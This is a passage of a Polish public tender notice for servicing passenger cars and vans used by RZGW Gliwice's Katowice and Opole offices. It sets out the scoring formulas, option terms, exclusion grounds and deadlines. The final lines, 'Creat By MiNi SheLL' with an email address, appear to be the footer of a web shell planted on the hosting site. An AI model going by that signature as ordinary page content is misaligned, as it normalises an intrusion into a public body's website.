</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Ocenie będą podlegały oferty ważne tj. oferty niepodlegające odrzuceniu.<br/>2.Oferty oceniane będą na podstawie następujących kryteriów:<br/>2.1 cena brutto – waga 60 %<br/>2.2 termin przyjęcia pojazdu– waga 40 %<br/>oddzielnie dla każdej części zamówienia.<br/>3. Ocena ofert zostanie dokonana wg poniższego wzoru:<br/>P = Pc + Pt<br/>gdzie:<br/>P – łączna liczba punktów przyznanych badanej ofercie,<br/>Pc – liczba punktów w kryterium „cena brutto”,<br/>Pt – liczba punktów w kryterium „termin przyjęcia pojazdu”.<br/>4. Ocena w poszczególnych kryteriach dokonywana będzie na poniższych zasadach:<br/>4.1 Każda z ważnych ofert będzie punktowana w kryterium określonym<br/>w pkt 15.2.1 SWZ poprzez porównanie ceny brutto oferty badanej dla danej części zamówienia do ceny brutto najniższej ze<br/>wszystkich ważnych ofert dla danej części zamówienia, wg poniższego wzoru:<br/>Pc = (Cn : Cb) x 60<br/>gdzie:<br/>Cn – cena brutto najniższa spośród wszystkich ofert podlegających ocenie,<br/>Cb – cena brutto oferty badanej.<br/>4.2 Każda z ważnych ofert będzie punktowana w kryterium określonym<br/>w pkt 15.2.2 SWZ poprzez przyznanie punktów za zaoferowany termin przyjęcia pojazdu w następujący sposób:<br/>Kryterium „Termin przyjęcia pojazdu ”<br/>- 40 punktów za przyznanie do 2 dni roboczych<br/>- 20 punktów za przyznanie 3-4 dni roboczych<br/>- 0 punktów za przyznanie 5 dni roboczych<br/>Zaoferowanie przyjęcia pojazdu do naprawy w terminie dłuższym niż 5 dni roboczych spowoduje odrzucenie oferty jako niezgodnej z<br/>SWZ, na podstawie art. 226 ust, 1 pkt 5 ustawy Pzp.<br/>Liczba dni roboczych liczona jest od przekazania przez Zamawiającego zamówienia drogą elektroniczną (platforma internetowa) do<br/>momentu potwierdzenia odbioru przez Zamawiającego.<br/>Minimalny termin przyjęcia pojazdu do warsztatu wynosi 1 dzień roboczy, maksymalny termin wynosi 5 dni roboczych. W przypadku<br/>niewskazania przez Wykonawcę w Formularzu oferty żadnego terminu, Zamawiający uzna, że Wykonawca zaoferował maksymalny<br/>wskazany przez Zamawiającego termin i przyzna 0 punktów.<br/>Za dzień roboczy rozumie się dzień od poniedziałku do piątku.<br/>Zamawiający udzieli niniejszego zamówienia temu Wykonawcy, który otrzyma najwyższą liczbę punktów.<br/>Jeżeli Zamawiający nie może dokonać wyboru oferty najkorzystniejszej ze względu na to, że dwie lub więcej ofert przedstawia taki<br/>sam bilans ceny<br/>i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z najniższą ceną.<br/>Cena podana w Formularzu ofertowym jest ceną ostateczną, niepodlegającą negocjacji i wyczerpującą wszelkie należności<br/>Wykonawcy wobec Zamawiającego związane z realizacją przedmiotu zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin przyjęcia pojazdu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Serwis samochodów osobowych i dostawczych o DMC poniżej 3,5 tony użytkowanych w RZGW GLIWICE – Zarząd Zlewni w Katowicach </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 28445,28 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50112100-4 - Usługi w zakresie napraw samochodów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje zastosowanie prawa opcji, polegającego na: <br/>1)	świadczeniu usług zgodnie z Umową po cenach określonych w ofercie Wykonawcy, po zakończeniu pierwotnego terminu realizacji Umowy (12 miesięcy) przez okres nie dłuższy niż 12 miesięcy, <br/>2)	zwiększeniu zakresu zobowiązania umownego, tj. dodatkowej realizacji usług w zakresie wskazanym w formularzu ofertowym, po cenach określonych w ofercie Wykonawcy, które nie przekroczy 20 % wartości maksymalnej całkowitej wartości umowy w ramach zamówienia podstawowego,<br/>3)	Zamawiający może skorzystać w obu wariantów prawa opcji tak łącznie, jak i każdego z osobna według własnego wyboru.<br/>4)	W celu skorzystania z prawa opcji, o którym mowa w ust. 2 pkt 1 Zamawiający przekaże Wykonawcy oświadczenie w formie pisemnej w terminie nie krótszym niż 10 dni przed terminem zakończenia terminu podstawowego, ze wskazaniem okresu o jaki zostanie przedłużony termin wykonania Umowy.<br/>5)	W celu skorzystania z prawa opcji, o którym mowa w ust. 2 pkt 2 Zamawiający przekaże Wykonawcy oświadczenie w formie pisemnej, w terminie obowiązywania Umowy (termin podstawowy i termin z opcji), o potrzebie realizacji dodatkowych usług w ramach prawa opcji.<br/>6)	Wykonawca po otrzymaniu informacji, o której mowa w ust. 4 i/lub ust. 5 zobowiązany będzie do świadczenia usług na zasadach określonych w Umowie.<br/>7)	Zamawiający zastrzega, iż część zamówienia określona jako prawo opcji jest uprawnieniem, a nie zobowiązaniem Zamawiającego. Realizacja opcji może, ale nie musi nastąpić, wyłącznie w zależności od zapotrzebowania i możliwości finansowych Zamawiającego i na skutek jego dyspozycji w tym zakresie. Brak realizacji zamówienia w tym zakresie nie będzie rodzić żadnych roszczeń ze strony Wykonawcy w stosunku do Zamawiającego.<br/>8)	Kwota prawa opcji: 53 812,82 zł brutto <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Ocenie będą podlegały oferty ważne tj. oferty niepodlegające odrzuceniu.<br/>2.Oferty oceniane będą na podstawie następujących kryteriów:<br/>2.1 cena brutto – waga 60 %<br/>2.2 termin przyjęcia pojazdu– waga 40 %<br/>oddzielnie dla każdej części zamówienia.<br/>3. Ocena ofert zostanie dokonana wg poniższego wzoru:<br/>P = Pc + Pt<br/>gdzie:<br/>P – łączna liczba punktów przyznanych badanej ofercie,<br/>Pc – liczba punktów w kryterium „cena brutto”,<br/>Pt – liczba punktów w kryterium „termin przyjęcia pojazdu”.<br/>4. Ocena w poszczególnych kryteriach dokonywana będzie na poniższych zasadach:<br/>4.1 Każda z ważnych ofert będzie punktowana w kryterium określonym<br/>w pkt 15.2.1 SWZ poprzez porównanie ceny brutto oferty badanej dla danej części zamówienia do ceny brutto najniższej ze<br/>wszystkich ważnych ofert dla danej części zamówienia, wg poniższego wzoru:<br/>Pc = (Cn : Cb) x 60<br/>gdzie:<br/>Cn – cena brutto najniższa spośród wszystkich ofert podlegających ocenie,<br/>Cb – cena brutto oferty badanej.<br/>4.2 Każda z ważnych ofert będzie punktowana w kryterium określonym<br/>w pkt 15.2.2 SWZ poprzez przyznanie punktów za zaoferowany termin przyjęcia pojazdu w następujący sposób:<br/>Kryterium „Termin przyjęcia pojazdu ”<br/>- 40 punktów za przyznanie do 2 dni roboczych<br/>- 20 punktów za przyznanie 3-4 dni roboczych<br/>- 0 punktów za przyznanie 5 dni roboczych<br/>Zaoferowanie przyjęcia pojazdu do naprawy w terminie dłuższym niż 5 dni roboczych spowoduje odrzucenie oferty jako niezgodnej z<br/>SWZ, na podstawie art. 226 ust, 1 pkt 5 ustawy Pzp.<br/>Liczba dni roboczych liczona jest od przekazania przez Zamawiającego zamówienia drogą elektroniczną (platforma internetowa) do<br/>momentu potwierdzenia odbioru przez Zamawiającego.<br/>Minimalny termin przyjęcia pojazdu do warsztatu wynosi 1 dzień roboczy, maksymalny termin wynosi 5 dni roboczych. W przypadku<br/>niewskazania przez Wykonawcę w Formularzu oferty żadnego terminu, Zamawiający uzna, że Wykonawca zaoferował maksymalny<br/>wskazany przez Zamawiającego termin i przyzna 0 punktów.<br/>Za dzień roboczy rozumie się dzień od poniedziałku do piątku.<br/>Zamawiający udzieli niniejszego zamówienia temu Wykonawcy, który otrzyma najwyższą liczbę punktów.<br/>Jeżeli Zamawiający nie może dokonać wyboru oferty najkorzystniejszej ze względu na to, że dwie lub więcej ofert przedstawia taki<br/>sam bilans ceny<br/>i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z najniższą ceną.<br/>Cena podana w Formularzu ofertowym jest ceną ostateczną, niepodlegającą negocjacji i wyczerpującą wszelkie należności<br/>Wykonawcy wobec Zamawiającego związane z realizacją przedmiotu zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin przyjęcia pojazdu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Serwis samochodów osobowych i dostawczych o DMC poniżej 3,5 tony użytkowanych w RZGW GLIWICE – Zarząd Zlewni w Opolu </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 56111 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50112100-4 - Usługi w zakresie napraw samochodów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje zastosowanie prawa opcji, polegającego na: <br/>1)	świadczeniu usług zgodnie z Umową po cenach określonych w ofercie Wykonawcy, po zakończeniu pierwotnego terminu realizacji Umowy (12 miesięcy) przez okres nie dłuższy niż 12 miesięcy, <br/>2)	zwiększeniu zakresu zobowiązania umownego, tj. dodatkowej realizacji usług w zakresie wskazanym w formularzu ofertowym, po cenach określonych w ofercie Wykonawcy, które nie przekroczy 20 % wartości maksymalnej całkowitej wartości umowy w ramach zamówienia podstawowego,<br/>3)	Zamawiający może skorzystać w obu wariantów prawa opcji tak łącznie, jak i każdego z osobna według własnego wyboru.<br/>4)	W celu skorzystania z prawa opcji, o którym mowa w ust. 2 pkt 1 Zamawiający przekaże Wykonawcy oświadczenie w formie pisemnej w terminie nie krótszym niż 10 dni przed terminem zakończenia terminu podstawowego, ze wskazaniem okresu o jaki zostanie przedłużony termin wykonania Umowy.<br/>5)	W celu skorzystania z prawa opcji, o którym mowa w ust. 2 pkt 2 Zamawiający przekaże Wykonawcy oświadczenie w formie pisemnej, w terminie obowiązywania Umowy (termin podstawowy i termin z opcji), o potrzebie realizacji dodatkowych usług w ramach prawa opcji.<br/>6)	Wykonawca po otrzymaniu informacji, o której mowa w ust. 4 i/lub ust. 5 zobowiązany będzie do świadczenia usług na zasadach określonych w Umowie.<br/>7)	Zamawiający zastrzega, iż część zamówienia określona jako prawo opcji jest uprawnieniem, a nie zobowiązaniem Zamawiającego. Realizacja opcji może, ale nie musi nastąpić, wyłącznie w zależności od zapotrzebowania i możliwości finansowych Zamawiającego i na skutek jego dyspozycji w tym zakresie. Brak realizacji zamówienia w tym zakresie nie będzie rodzić żadnych roszczeń ze strony Wykonawcy w stosunku do Zamawiającego.<br/>8)	Kwota prawa opcji: 53 812,82 zł brutto <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Ocenie będą podlegały oferty ważne tj. oferty niepodlegające odrzuceniu.<br/>2.Oferty oceniane będą na podstawie następujących kryteriów:<br/>2.1 cena brutto – waga 60 %<br/>2.2 termin przyjęcia pojazdu– waga 40 %<br/>oddzielnie dla każdej części zamówienia.<br/>3. Ocena ofert zostanie dokonana wg poniższego wzoru:<br/>P = Pc + Pt<br/>gdzie:<br/>P – łączna liczba punktów przyznanych badanej ofercie,<br/>Pc – liczba punktów w kryterium „cena brutto”,<br/>Pt – liczba punktów w kryterium „termin przyjęcia pojazdu”.<br/>4. Ocena w poszczególnych kryteriach dokonywana będzie na poniższych zasadach:<br/>4.1 Każda z ważnych ofert będzie punktowana w kryterium określonym<br/>w pkt 15.2.1 SWZ poprzez porównanie ceny brutto oferty badanej dla danej części zamówienia do ceny brutto najniższej ze<br/>wszystkich ważnych ofert dla danej części zamówienia, wg poniższego wzoru:<br/>Pc = (Cn : Cb) x 60<br/>gdzie:<br/>Cn – cena brutto najniższa spośród wszystkich ofert podlegających ocenie,<br/>Cb – cena brutto oferty badanej.<br/>4.2 Każda z ważnych ofert będzie punktowana w kryterium określonym<br/>w pkt 15.2.2 SWZ poprzez przyznanie punktów za zaoferowany termin przyjęcia pojazdu w następujący sposób:<br/>Kryterium „Termin przyjęcia pojazdu ”<br/>- 40 punktów za przyznanie do 2 dni roboczych<br/>- 20 punktów za przyznanie 3-4 dni roboczych<br/>- 0 punktów za przyznanie 5 dni roboczych<br/>Zaoferowanie przyjęcia pojazdu do naprawy w terminie dłuższym niż 5 dni roboczych spowoduje odrzucenie oferty jako niezgodnej z<br/>SWZ, na podstawie art. 226 ust, 1 pkt 5 ustawy Pzp.<br/>Liczba dni roboczych liczona jest od przekazania przez Zamawiającego zamówienia drogą elektroniczną (platforma internetowa) do<br/>momentu potwierdzenia odbioru przez Zamawiającego.<br/>Minimalny termin przyjęcia pojazdu do warsztatu wynosi 1 dzień roboczy, maksymalny termin wynosi 5 dni roboczych. W przypadku<br/>niewskazania przez Wykonawcę w Formularzu oferty żadnego terminu, Zamawiający uzna, że Wykonawca zaoferował maksymalny<br/>wskazany przez Zamawiającego termin i przyzna 0 punktów.<br/>Za dzień roboczy rozumie się dzień od poniedziałku do piątku.<br/>Zamawiający udzieli niniejszego zamówienia temu Wykonawcy, który otrzyma najwyższą liczbę punktów.<br/>Jeżeli Zamawiający nie może dokonać wyboru oferty najkorzystniejszej ze względu na to, że dwie lub więcej ofert przedstawia taki<br/>sam bilans ceny<br/>i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z najniższą ceną.<br/>Cena podana w Formularzu ofertowym jest ceną ostateczną, niepodlegającą negocjacji i wyczerpującą wszelkie należności<br/>Wykonawcy wobec Zamawiającego związane z realizacją przedmiotu zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin przyjęcia pojazdu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1	Oświadczenie Wykonawcy/Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia/Podmiotu udostepniającego zasoby o aktualności informacji zawartych w oświadczeniu, w zakresie podstaw wykluczenia <br/>z postępowania wskazanych przez Zamawiającego, zgodnego ze wzorem Załącznika Nr 7 do SWZ.<br/>2	Oświadczenie Wykonawcy o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz <br/>z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej, zgodnego ze wzorem Załącznika Nr 8 do SWZ.<br/>3	Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, sporządzonego nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4 ustawy Pzp.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zamawiający dopuszcza możliwość składania oferty przez dwóch lub więcej Wykonawców (w ramach oferty wspólnej w rozumieniu art. 58 ustawy Pzp) pod warunkiem, że taka oferta spełniać będzie następujące wymagania:<br/>11.1	Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.<br/>11.2	Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z pełnomocnikiem, którego adres należy wpisać w Formularzu oferty.<br/>11.3	Pełnomocnictwo lub inny dokument (np. umowa konsorcjum, spółki cywilnej) z którego wynika takie pełnomocnictwo należy złożyć razem z ofertą.<br/>11.4	Każdy z Wykonawców wspólnie ubiegających się o zamówienie składa oświadczenie zgodne z treścią Załącznika Nr 6 do SWZ, aktualne na dzień składania ofert, celem potwierdzenia, że każdy z Wykonawców ubiegających się wspólnie o zamówienie nie podlega wykluczeniu z postępowania na podstawie art. 108 ust. 1 oraz oraz art. 109 ust. 1 pkt 4, 5, 7 oraz 8 ustawy Pzp a także na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. <br/>z 2022 r., poz. 835).<br/>11.5	Każdy z Wykonawców występujących wspólnie obowiązany jest do wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia publicznego. W takim przypadku oświadczenia lub dokumenty wymienione w pkt 10.3.1-10.3.3 SWZ składa każdy z Wykonawców występujących wspólnie.<br/>11.6	Zamawiający nie zastrzega obowiązku osobistego wykonania przez jednego <br/>z Wykonawców kluczowych części zamówienia.<br/>11.7	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. W takiej sytuacji Wykonawcy są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 18.3	Na podstawie art. 455 ust. 1 ustawy Pzp, Zamawiający informuje, że przewiduje możliwość zmian postanowień zawartej umowy w przypadkach określonych <br/>w § 9 Wzoru projektowanych postanowień umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-03-07 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma Zakupowa</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-03-07 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com